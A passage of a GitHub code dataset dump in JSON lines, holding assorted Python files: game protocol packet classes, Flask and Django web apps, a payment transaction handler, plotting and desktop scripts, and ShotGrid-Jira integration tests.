self.x = x\n self.y = y\n self.z = z\n self.angle = angle\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'x',\n 'y',\n 'z',\n 'angle',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n location = (\n (self.x & 0x3_fff_fff) << 38 |\n (self.z & 0x3_fff_fff) << 12 |\n (self.y & 0xfff)\n )\n\n return b'%b%b' % (\n location.to_bytes(8, 'big'),\n _byte.render_float(self.angle),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n location = int.from_bytes(_islice(it, 8), 'big', signed=True)\n\n self.y = location | -0x800 if location & 0x800 else location & 0x7ff\n\n location >>= 12\n self.z = (location | -0x2_000_000 if location & 0x2_000_000\n else location & 0x1_fff_fff)\n\n self.x = location >> 26\n\n self.angle = _iter.consume_float(it)\n () = it\n\n\n# TODO: complete\nclass EntityMetadata(Packet):\n\n id = 0x4d\n\n def __init__(self, entity_id: int, metadata: bytes | bytearray) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.metadata = metadata\n # ...\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'metadata',\n # ...,\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.entity_id),\n self.metadata,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.metadata = bytes(it)\n # ...\n # () = it\n\n\n# TODO: complete\nclass EntityEquipment(Packet):\n\n id = 0x50\n\n def __init__(self, entity_id: int, equipment: bytes | bytearray) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n self.equipment = equipment\n # ...\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n 'equipment',\n # ...,\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.entity_id),\n self.equipment,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n self.equipment = bytes(it)\n # ...\n # () = it\n\n\nclass TimeUpdate(Packet):\n\n id = 0x59\n\n def __init__(self, world_age: int = 0, time_of_day: int = 0) -> None:\n\n super().__init__()\n\n self.world_age = world_age\n self.time_of_day = time_of_day\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'world_age',\n 'time_of_day',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n self.world_age.to_bytes(8, 'big', signed=True),\n self.time_of_day.to_bytes(8, 'big', signed=True),\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.world_age = int.from_bytes(_islice(it, 8), 'big', signed=True)\n self.time_of_day = int.from_bytes(_islice(it, 8), 'big', signed=True)\n () = it\n\n assert self.world_age >= 0\n\n\n# TODO: complete\nclass EntityProperties(Packet):\n\n id = 0x64\n\n def __init__(self, entity_id: int, raw_tail: bytes | bytearray) -> None:\n\n super().__init__()\n\n self.entity_id = entity_id\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n 'entity_id',\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b%b' % (\n _byte.render_varint(self.entity_id),\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n self.entity_id = _iter.consume_varint(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass DeclareRecipes(Packet):\n\n id = 0x66\n\n def __init__(self, raw_tail: bytes) -> None:\n\n super().__init__()\n\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b' % (\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n\n\n# TODO: complete\nclass Tags(Packet):\n\n id = 0x67\n\n def __init__(self, raw_tail: bytes) -> None:\n\n super().__init__()\n\n # ...\n self.raw_tail = raw_tail\n\n def __getstate__(self) -> dict[str, object]:\n\n return {key: getattr(self, key) for key in [\n # ...,\n 'raw_tail',\n ]}\n\n @property\n def payload(self) -> bytes | bytearray:\n\n return b'%b' % (\n # ...,\n self.raw_tail,\n )\n\n @payload.setter\n def payload(self, it: bytes | bytearray | _Iterator[int]) -> None:\n\n it = iter(it)\n # ...\n self.raw_tail = bytes(it)\n # () = it\n","repo_name":"blubberdiblub/prodis","sub_path":"src/prodis/packets/play/clientbound.py","file_name":"clientbound.py","file_ext":"py","file_size_in_byte":31418,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"39944836362","text":"from flask import Flask, g, request, jsonify, current_app, make_response\nfrom config_example import FlaskConfig\nfrom scraper.scraper import Scraper\nfrom database.databasehandler import DatabaseHandler\nimport imghdr\n\napp = Flask('semantive')\napp.config.from_object(FlaskConfig)\n\ndef get_scraper():\n return g.setdefault('scraper', Scraper())\n\ndef get_connector():\n return g.setdefault('db_connector', DatabaseHandler(current_app.config['DATABASE']))\n\n@app.route('/api/scraping-tasks/', methods=['GET'])\ndef get_scraping_tasks():\n \"\"\"\n Returns collection of all the scraping tasks in the system\n :return: all scraping tasks\n \"\"\"\n url = request.args.get('website-url')\n tasks = get_connector().get_tasks_collection(url=url)\n return jsonify(tasks)\n\n@app.route('/api/scraping-tasks/', methods=['POST'])\ndef create_scraping_task():\n \"\"\"\n Create new scraping task and send it the task queue\n :return: OK if created\n \"\"\"\n data = request.get_json()\n if not data:\n return 'Bad request', 400\n url = data.get('url')\n data_type = data.get('data_type')\n tag = data.get('tag')\n if None in (url, data_type, tag):\n return 'Bad request', 400\n get_scraper().create_scraping_task(url=url, data_type=data_type, tag=tag)\n return 'OK'\n\n@app.route('/api/scraping-tasks/', methods=['GET'])\ndef get_scraping_task_by_id(uuid):\n \"\"\"\n Get information about scraping task with given uuid\n :param id: uuid of the task to return\n :return: information about given task\n \"\"\"\n data = get_connector().get_task(uuid=uuid)\n if not data:\n return 'Task with given id does not exist', 404\n return jsonify(data)\n\n@app.route('/api/images/', methods=['GET'])\ndef get_images():\n \"\"\"\n Get collection of all images in the system\n :return: collection of all images\n \"\"\"\n url = request.args.get('website-url')\n tag = request.args.get('tag')\n images = get_connector().get_images_collection(url=url, tag=tag)\n return jsonify(images)\n\n@app.route('/api/images//', methods=['GET'])\ndef get_image_by_id(id):\n \"\"\"\n Return image resource with given id\n :param id: id of wanted image resource\n :return:\n \"\"\"\n data = get_connector().get_image(id=id)\n if not data:\n return 'Image with given id does not exist', 404\n return jsonify(data)\n\n@app.route('/api/images//', methods=['DELETE'])\ndef delete_image(id):\n \"\"\"\n Delete image resource with given id\n :param id: id of image to delete\n :return:\n \"\"\"\n data = get_connector().get_image(id=id)\n if not data:\n return 'Image with given id does not exist', 404\n get_connector().delete_image(id=id)\n return 'Image removed', 204\n\n@app.route('/api/images//content', methods=['GET'])\ndef get_image_content(id):\n \"\"\"\n Return content of an image with given id\n :param id: id of wanted image\n :return: image\n \"\"\"\n data = get_connector().get_image_content(id=id)\n if not data:\n return 'Image with given id does not exist', 404\n response = make_response(data.get(\"content\"), 200)\n response.headers['Content-Type'] = imghdr.what(None, h=data)\n return response\n\n@app.route('/api/texts/', methods=['GET'])\ndef get_texts():\n \"\"\"\n Get collection of all texts in the system\n :return: collection of all texts\n \"\"\"\n url = request.args.get('website-url')\n tag = request.args.get('tag')\n texts = get_connector().get_texts_collection(url=url, tag=tag)\n return jsonify(texts)\n\n@app.route('/api/texts//', methods=['GET'])\ndef get_text_by_id(id):\n \"\"\"\n Return text resource with given id\n :param id: id of wanted text resource\n \"\"\"\n data = get_connector().get_text(id=id)\n if not data:\n return 'Text with given id does not exist', 404\n return jsonify(data)\n\n@app.route('/api/texts//', methods=['DELETE'])\ndef delete_text(id):\n \"\"\"\n Delete text resource with given id\n :param id: id of text to delete\n :return:\n \"\"\"\n data = get_connector().get_text(id=id)\n if not data:\n return 'Text with given id does not exist', 404\n get_connector().delete_text(id=id)\n return 'Text removed', 204\n\n@app.route('/api/texts//content', methods=['GET'])\ndef get_text_content(id):\n \"\"\"\n Return content of a text with given id\n :param id: id of wanted text\n \"\"\"\n data = get_connector().get_text_content(id=id)\n if not data:\n return 'Text with given id does not exist', 404\n response = make_response(data.get(\"content\"), 200)\n response.headers['Content-Type'] = 'text/plain'\n return response\n\n\nif __name__ == '__main__':\n app.run()","repo_name":"perkam/semantive","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4688,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"10948589309","text":"import matplotlib.pyplot as plt\r\nimport pandas as pd\r\nimport seaborn\r\ndf = pd.read_csv(\"../references/한국산업안전보건공단_규모별 사고재해자수_12_31_2020.csv\", encoding='cp949')\r\n\r\ncol_name = [df.columns[0]]\r\nfor name in df.columns[1:]:\r\n col_name.append(name[:4])\r\n\r\ndf.columns = col_name\r\n\r\ndf = df.T\r\ndf = df.rename(columns=df.iloc[0])\r\ndf = df.drop(df.index[0])\r\nprint(df)\r\nfig, ax_base = plt.subplots(figsize=(40,5))\r\n\r\nlis = ax_base.plot(df[df.columns[0]], label=df.columns[0])\r\nlis_buf = [df.columns[0]]\r\nfor name in df.columns[1:]:\r\n lis = ax_base.plot(df[name], label=df.columns[0])\r\n lis_buf.append(name)\r\nlabs = [l.get_label() for l in lis_buf]\r\nax_base.legend(lis_buf, labs, loc=1)\r\n\r\nax_base.grid()\r\nplt.show()\r\n# line1 = ax1.plot(df[\"\"])\r\n\r\n\r\n\r\n","repo_name":"shadowcat0202/Polytechnics","sub_path":"Project/밴처창업견진대회/python/data-visualization.py","file_name":"data-visualization.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"21271267937","text":"import subprocess\n\nout=subprocess.run([\"wmctrl\", \"-d\"], capture_output=True, text=True).stdout\nbuttons = [\"(box \"]\nfor i, line in enumerate(out.split(\"\\n\")):\n if len(line) == 0:\n break\n splitted = line.split()\n is_active = splitted[1] == \"*\"\n name = splitted[-1]\n css_class = \"active_workspace inner_box\" if is_active else \"workspace\" \n buttons.append(\"(button :onclick \\\"wmctrl -s \" + str(i) + \"\\\" :class \\\"\" + css_class + \"\\\" \\\"\" + name + \"\\\")\")\nprint(''.join(buttons) + \")\")\n","repo_name":"EmiOnGit/dotfiles","sub_path":"eww/scripts/bar/workspaces.py","file_name":"workspaces.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"7921857959","text":"from django.contrib.auth import login, logout\nfrom django.contrib.auth.forms import AuthenticationForm, UserCreationForm\nfrom django.http import HttpResponse\nfrom django.contrib import messages\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom django.views import View\n\nfrom django.views.generic import DetailView\nfrom tablib import Dataset\nfrom django.shortcuts import get_object_or_404\nfrom .resources import *\nfrom .models import *\n\nfrom django.shortcuts import render\n\n# Create your views here.\ndef start(request):\n return HttpResponse('start')\n\ndef login_view(request):\n if request.method == 'POST':\n form = AuthenticationForm(data=request.POST)\n if form.is_valid():\n user = form.get_user()\n login(request,user)\n return HttpResponse('Log In Successfully')\n\n else:\n form = AuthenticationForm()\n return render(request,'p1/login.html', {'form':form})\n\ndef signup_view(request):\n if request.method == 'POST':\n form = UserCreationForm(data=request.POST)\n if form.is_valid():\n user = form.save()\n login(request,user)\n return HttpResponse('SignUp Successfully')\n else:\n form = UserCreationForm()\n\n return render(request,'p1/signup.html', {'form':form})\n\ndef logout_view(request):\n if request.method == 'POST':\n logout(request)\n return HttpResponse('Log Out Successfully')\n\n\n\ndef upload_excel(request):\n if request.method == 'POST':\n question_resource = QuestionResource()\n dataset = Dataset()\n new_question = request.FILES['myfile']\n\n if not new_question.name.endswith('xlsx'):\n messages.info(request,'Error')\n return render(request,upload_excel)\n\n import_data = dataset.load(new_question.read(),format='xlsx')\n for data in import_data:\n if (data[0] != None):\n print(data[0])\n value = Questions.objects.create(\n Question_Text= data[0],\n Test= Test.objects.filter(title=data[10]).first(),\n )\n value.save()\n\n for i in range(1,10):\n value = Options(\n Option_Text= data[i],\n Question= Questions.objects.filter(Question_Text=data[0]).first(),\n )\n value.save()\n\n return render(request,'p1/uploadexcel.html')\n\n#------------------------------------------------------------------------------------------------\n\nclass result(View):\n def get(self, request, user, test):\n res = [0, 0, 0, 0, 0, 0, 0, 0, 0]\n set = Answers.objects.filter(user=user).filter(Option__Question__Test=test)\n for i in range(set.count()):\n res[set[i].Option.id%9] += set[i].number\n print(res)\n\n ","repo_name":"navid-ebrahimi/Belbin-Project","sub_path":"p1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"23819601938","text":"#!/data/project/nullzerobot/python/bin/python\n\nimport flask.ext.wtf\nfrom flask.ext.wtf import *\nfrom flask import request\nfrom messages import msg\nfrom werkzeug.datastructures import MultiDict\nimport wtforms.validators as v\n\nclass _Form(Form):\n def __init__(self, *args, **kwargs):\n args = list(args)\n if args:\n self.request = args[0]\n args[0] = MultiDict(args[0])\n args[0].update(kwargs)\n super(_Form, self).__init__(*args, csrf_enabled=False)\n for field in self.data:\n field = getattr(self, field)\n for validator in field.validators:\n if isinstance(validator, v.Required):\n field.label.text = (u'{0}{1}').format(\n field.label.text, msg['core-required-symbol'])\n\n def validate(self, data=None):\n def isInteracting():\n if request.form:\n return True\n for fieldname in self.data:\n field = getattr(self, fieldname)\n ignore = False\n for validator in field.validators:\n if isinstance(validator, v.IgnoreMe):\n ignore = True\n break\n if not ignore and self.data[fieldname]:\n return True\n return False\n\n interacting = isInteracting()\n\n fail = False\n\n if not super(_Form, self).validate():\n fail = True\n if not fail and data:\n errors = data.validate()\n for field in errors:\n getattr(self, field).errors.extend(errors[field])\n if errors:\n fail = True\n\n if fail:\n if not interacting:\n for fieldname in self.data:\n field = getattr(self, fieldname)\n field.errors = []\n return False\n return True\n\nflask.ext.wtf.Form = _Form\n","repo_name":"nullzero/wpcgi","sub_path":"wpcgi/package/p_form/p_class.py","file_name":"p_class.py","file_ext":"py","file_size_in_byte":1975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21679327647","text":"from flask import Flask, request, redirect, render_template, session\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://build-a-blog:launchcode@localhost:8889/build-a-blog'\n# Note: The connection string after :// contains the following info:\n# user:password@server:portNumber/databaseName\napp.config['SQLALCHEMY-ECHO'] = True\ndb = SQLAlchemy(app)\n\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(120))\n body = db.Column(db.String(200))\n\n def __init__(self, name, body):\n self.name = name\n self.body = body\n\n\n@app.route('/new_post', methods=['GET', 'POST'])\ndef new_post():\n name = ''\n body = ''\n name_error = ''\n body_error = ''\n\n if request.method == 'GET':\n return render_template('new_post.html')\n \n if request.method == 'POST':\n name = request.form['name']\n body = request.form['body']\n if name == '':\n name_error = \"Please enter a name for your blog\"\n if body == '':\n body_error = \"Please enter your blog\"\n\n if name_error and body_error:\n return render_template('new_post.html', name_error=name_error, body_error=body_error)\n elif name_error and not body_error:\n return render_template('new_post.html', name_error=name_error, body=body)\n elif body_error and not name_error:\n return render_template('new_post.html', name=name, body_error=body_error)\n else:\n blog = Blog(name, body)\n db.session.add(blog)\n db.session.commit()\n return redirect(\"/individual_blog?id=\" + str(blog.id))\n\n\n@app.route('/individual_blog', methods=['GET'])\ndef individual_blog():\n blog_id = request.args.get('id')\n blog = Blog.query.filter_by(id=blog_id).first()\n return render_template('individual_blog.html', blog=blog)\n\n\n@app.route('/', methods=['POST', 'GET'])\ndef index():\n all_blogs = Blog.query.all()\n return render_template('blogs.html', title=\"Build A Blog\", all_blogs=all_blogs)\n\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"Judy2001/build-a-blog","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"46270271993","text":"from app.models import db, Board, Pin, environment, SCHEMA\n\n\ndef seed_board_pins():\n board4 = Board(\n name='Inspirations', user_id=1)\n pin12 = Pin(\n title= 'Quotes', description='positive energy', image_URL=\"https://i.pinimg.com/564x/96/51/04/965104b3f041f4a50b829388964e2a18.jpg\", user_id=1)\n \n db.session.add(board4)\n db.session.add(pin12)\n board4.pins.append(pin12)\n\n db.session.commit()","repo_name":"HeidiSongg/PinTrendy","sub_path":"app/seeds/board_pins.py","file_name":"board_pins.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"1118904285","text":"#Не до конца смог разобрать задание, а в чем отличие от прошлого 10? Надо было это сделать как то с применением\n# рекурсии?\n\ndef min_len(x, y):\n\treturn min(len(x), len(y))\n\ndef zip_clone(obj1, obj2):\n\tobj1, obj2 = list(obj1), list(obj2)\n\tzip_tuple =((obj1[i], obj2[i]) for i in range(min_len(obj1, obj2)))\n\treturn zip_tuple\n\n\n\n\n\n\na = 'sdf'\nb = [1, 2, 3, 4, 5]\nc = (1, 2, 3, 4, 5)\nd = {1, 2, 3, 4, 5, 6}\ne = {1: 2, 3: 4, 5: 6}\n\n\nprint(list(zip_clone(e, d)))\n\n# Принято\n","repo_name":"RusQs/educational_projects_python","sub_path":"Module21/02_my_zip_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"33623290702","text":"import traceback\nimport uuid\nfrom flask import request\nfrom flask_log_request_id import current_request_id\n\n\nclass AppLogger:\n\n def __init__(self, app):\n self.app = app\n app.before_request(self.before_request)\n app.after_request(self.after_request)\n app.teardown_request(self.teardown_request)\n\n def before_request(self):\n if current_request_id():\n request.request_id = current_request_id()\n elif \"X-Request-Id\" in request.headers:\n request.request_id = f'{request.headers[\"X-Request-Id\"]},{str(uuid.uuid4())}'\n else:\n request.request_id = str(uuid.uuid4())\n\n data = \"\"\n try:\n data = request.get_data().decode(\"utf-8\")\n except:\n pass\n\n self.app.logger.info(f'REQUEST: {request.method} {request.url}')\n self.app.logger.info(f'REQUEST HEADERS: {request.method} {request.url}\\n{request.headers}')\n self.app.logger.info(f'REQUEST BODY: {request.method} {request.url}\\n{data}')\n\n def after_request(self, response):\n data = \"\"\n try:\n data = response.get_data().decode(\"utf-8\")\n except Exception as e:\n pass\n\n self.app.logger.info(f'RESPONSE: {request.method} {request.url} {response.status}')\n self.app.logger.info(f'RESPONSE BODY: {request.method} {request.url}\\n{data}')\n\n return response\n\n def error_handler(self, e):\n tb = traceback.format_exc()\n self.app.logger.error(f'ERROR: {request.method} {request.url} 5xx INTERNAL SERVER ERROR\\n{tb}')\n return e.status_code if hasattr(e, 'status_code') else 500\n\n def teardown_request(self, e=None):\n self.app.logger.info(f'TEARDOWN: {request.method} {request.url}')\n if e:\n self.error_handler(e)\n","repo_name":"socrateslopes/partner-demo","sub_path":"src/utils/app_logger.py","file_name":"app_logger.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"3085423474","text":"import json\nfrom datetime import datetime\n\nfrom django.utils import timezone\n\nfrom .utils.format import BaseFormat\nfrom .utils.pstatus import PaycomStatus\n\nfrom api.models import User, Article\nfrom billing.models import AgentBalance, Transaction \n\n\nBILLING_USER = \"urmon-billing\"\nPAYCOM_USER = \"payme\"\n\n\nclass Transactions(PaycomStatus):\n params = None\n paycom_transaction_id = None\n transaction = None\n order = None\n formatter = BaseFormat()\n\n def __init__(self, params):\n self.params = params\n self.paycom_transaction_id = params[\"id\"] if \"id\" in params else 0\n\n def exist(self):\n try:\n self.transaction = Transaction.objects.get(\n transaction_id=self.paycom_transaction_id\n )\n return True\n except Transaction.DoesNotExist:\n return False\n\n def save_transaction(self):\n \"\"\"\n Bizda order mavjud bolmaganligi uchun order statusi update qilinmayapti\n Comment:\n Save transaction with state = 1 and set order state STATE_WAITING_PAY = 1\n self.transaction = new transaction\n \"\"\"\n tour_user = Article.objects.get(id=self.params['account']['tour_id']).author\n credit = AgentBalance.objects.get(\n user=tour_user\n )\n debit = User.objects.get(id=self.params['account']['user_id']) \n data = {\n \"debit\": debit,\n \"credit\": credit,\n \"amount\": self.params[\"amount\"],\n \"state\": self.STATE_CREATED,\n \"transaction_id\": self.paycom_transaction_id,\n \"time_millisecond\": self.params[\"time\"],\n }\n self.transaction = Transaction.objects.create(**data)\n\n def check_transaction_state(self, state=None):\n if state is None:\n state = self.STATE_CREATED\n return True if self.transaction.state == state else False\n\n def transaction_is_expired(self):\n time_interval = timezone.now() - self.transaction.created_at\n if (\n self.formatter.datetime_timedelta_to_milliseconds(_datetime=time_interval)\n > self.TIMEOUT\n ):\n return True\n else:\n return False\n\n def return_transaction_details(self, field=None):\n\n \"\"\"\n Comment: state, create_time|perform_time, transaction, receivers\n \"\"\"\n if field is None:\n field = \"created_at\"\n _datetime = getattr(self.transaction, field)\n time_in_milliseconds = (\n self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n utc_datetime=_datetime\n )\n )\n response = {\n \"result\": {\n \"state\": self.transaction.state,\n \"transaction\": str(self.transaction.id),\n }\n }\n if field == \"created_at\":\n response[\"result\"][\"create_time\"] = time_in_milliseconds\n else:\n response[\"result\"][field] = time_in_milliseconds\n return json.dumps(response)\n\n def cancel_transaction(self, reason, state=None):\n print(\"reason\", reason)\n print(\"state\", state)\n if state is None:\n state = self.STATE_CANCELLED\n self.transaction.state = state\n\n self.transaction.cancel_time = timezone.now()\n self.transaction.reason = reason\n self.transaction.save()\n\n def complete_transaction(self):\n self.transaction.state = self.STATE_COMPLETED\n self.transaction.perform_time = timezone.now()\n self.transaction.save()\n\n def get_transaction_details(self):\n cancel_time = self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n utc_datetime=self.transaction.cancel_time\n )\n perform_time = self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n utc_datetime=self.transaction.perform_time\n )\n create_time = self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n utc_datetime=self.transaction.created_at\n )\n reason = (\n int(self.transaction.reason)\n if self.transaction.reason is not None\n else None\n )\n data = {\n \"result\": {\n \"create_time\": create_time,\n \"perform_time\": perform_time,\n \"cancel_time\": cancel_time,\n \"transaction\": str(self.transaction.id),\n \"state\": self.transaction.state,\n \"reason\": reason,\n }\n }\n return json.dumps(data)\n\n def get_statement(self, _from, _to):\n datetime_from = datetime.utcfromtimestamp(_from / 1000.0)\n datetime_to = datetime.utcfromtimestamp(_to / 1000.0)\n timezone_from = timezone.make_aware(\n datetime_from, timezone.get_current_timezone()\n )\n timezone_to = timezone.make_aware(datetime_to, timezone.get_current_timezone())\n transactions = Transaction.objects.filter(\n created_at__range=[timezone_from, timezone_to], reason__isnull=True\n )\n\n regenerated_transactions = [\n {\n \"id\": item.transaction_id,\n \"time\": item.created_at,\n \"amount\": item.amount,\n \"account\": {\"id\": item.user.id},\n \"create_time\": self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n item.created_at\n ),\n \"perform_time\": self.formatter.millisecond_timestamp_from_utc_to_time_zone(\n item.perform_time\n ),\n \"cancel_time\": 0,\n \"transaction\": item.id,\n \"state\": 2,\n \"reason\": None,\n \"receivers\": [],\n }\n for item in transactions\n ]\n data = {\"result\": {\"transactions\": regenerated_transactions}}\n return json.dumps(data)\n","repo_name":"AFakhriddinov/backnew","sub_path":"payment/utils/transaction.py","file_name":"transaction.py","file_ext":"py","file_size_in_byte":5906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"19214738884","text":"import os\nimport logging\nimport datetime\nimport requests\nimport mock\n\nfrom shotgun_api3.lib import mockgun\n\nfrom test_base import TestBase\nfrom triggers import sg_jira_event_trigger\n\nlogger = logging.getLogger(__name__)\n\n\n# Some constants which can be used across tests\nPROJECT = {\"id\": 1, \"name\": \"Bunny\", \"type\": \"Project\"}\nEVENT = {\n \"attribute_name\": \"sg_status_list\",\n \"created_at\": datetime.datetime(2018, 11, 28, 15, 43, 7),\n \"entity\": {\"id\": 11793, \"name\": \"Art\", \"type\": \"Task\"},\n \"event_type\": \"Shotgun_Task_Change\",\n \"id\": 4044184,\n \"meta\": {\n \"attribute_name\": \"sg_status_list\",\n \"entity_id\": 11793,\n \"entity_type\": \"Task\",\n \"field_data_type\": \"status_list\",\n \"new_value\": \"wtg\",\n \"old_value\": \"fin\",\n \"type\": \"attribute_change\",\n },\n \"project\": PROJECT,\n \"session_uuid\": \"e8b61250-f31b-11e8-bb75-0242ac110004\",\n \"type\": \"EventLogEntry\",\n \"user\": {\"id\": 42, \"name\": \"Ford Escort\", \"type\": \"HumanUser\"},\n}\n\n\ndef mocked_requests_post(*args, **kwargs):\n \"\"\"\n Mock requests.post made the trigger and return a Response with the url\n and the payload.\n \"\"\"\n response = requests.Response()\n response.url = args[0]\n response._contents = kwargs\n response.status_code = 200\n return response\n\n\nclass TestSGTrigger(TestBase):\n \"\"\"\n Tests related to the ShotGrid Event trigger.\n \"\"\"\n\n def setUp(self):\n logging.basicConfig(format=\"%(levelname)s:%(name)s:%(message)s\")\n\n def test_project_sync_url_base_schema(self):\n \"\"\"\n Check nothing bad happens if a Project can't be found or if some\n needed fields are missing in the schema\n \"\"\"\n self.set_sg_mock_schema(\n os.path.join(os.path.dirname(__file__), \"fixtures\", \"schemas\", \"base\",)\n )\n shotgun = mockgun.Shotgun(\"http://unit_test_mock_sg\", \"mock_user\", \"mock_key\")\n # Check nothing bad happens if a Project can't be found or if some\n # needed fields are missing in the schema\n routing = {}\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n # Add missing project\n self.add_to_sg_mock_db(shotgun, PROJECT)\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n\n @mock.patch(\"requests.post\", side_effect=mocked_requests_post)\n def test_project_sync_url(self, mocked):\n \"\"\"\n Test retrieving the dispatch url for a Project.\n \"\"\"\n routing = {}\n # Switch to a schema with needed fields\n self.set_sg_mock_schema(\n os.path.join(os.path.dirname(__file__), \"fixtures\", \"schemas\", \"sg-jira\",)\n )\n shotgun = mockgun.Shotgun(\"http://unit_test_mock_sg\", \"mock_user\", \"mock_key\")\n self.add_to_sg_mock_db(shotgun, PROJECT)\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n self.assertIsNone(routing[PROJECT[\"id\"]])\n routing = {}\n url = \"http://localhost/default/sg2jira\"\n shotgun.update(\n PROJECT[\"type\"],\n PROJECT[\"id\"],\n data={\n \"sg_jira_sync_url\": {\n \"content_type\": \"string\",\n \"link_type\": \"web\",\n \"name\": \"test\",\n \"url\": \"http://localhost/default/sg2jira\",\n }\n },\n )\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n self.assertTrue(routing[PROJECT[\"id\"]].startswith(url))\n # The first sync for a Project also resets the bridge so it\n # generates 2 calls.\n self.assertEqual(mocked.call_count, 2)\n self.assertTrue(mocked.call_args[0][0].startswith(url))\n # Check the trigger clears its routing cache if the sync url is changed\n project_event = {\n \"event_type\": \"Shotgun_Project_Change\",\n \"entity\": PROJECT,\n \"project\": None,\n \"attribute_name\": \"sg_jira_sync_url\",\n \"meta\": {\n \"type\": \"attribute_change\",\n \"attribute_name\": \"sg_jira_sync_url\",\n \"entity_type\": PROJECT[\"type\"],\n \"entity_id\": PROJECT[\"id\"],\n \"field_data_type\": \"url\",\n \"old_value\": None,\n \"new_value\": {\n \"attachment_id\": 1416,\n \"attachment_type\": \"http_url\",\n \"display_name\": \"Jira Sync\",\n \"icon_url\": \"/images/filetypes/filetype_icon_misc.png\",\n \"icon_class\": \"icon_web\",\n \"url\": \"http://localhost/default/sg2jira\",\n \"attachment_uuid\": \"abcdefg\",\n },\n },\n }\n sg_jira_event_trigger.process_event(shotgun, logger, project_event, routing)\n self.assertFalse(PROJECT[\"id\"] in routing)\n # Processing the Task event should cache the routing again\n sg_jira_event_trigger.process_event(shotgun, logger, EVENT, routing)\n self.assertTrue(PROJECT[\"id\"] in routing)\n self.assertTrue(routing[PROJECT[\"id\"]].startswith(url))\n mocked.assert_called()\n 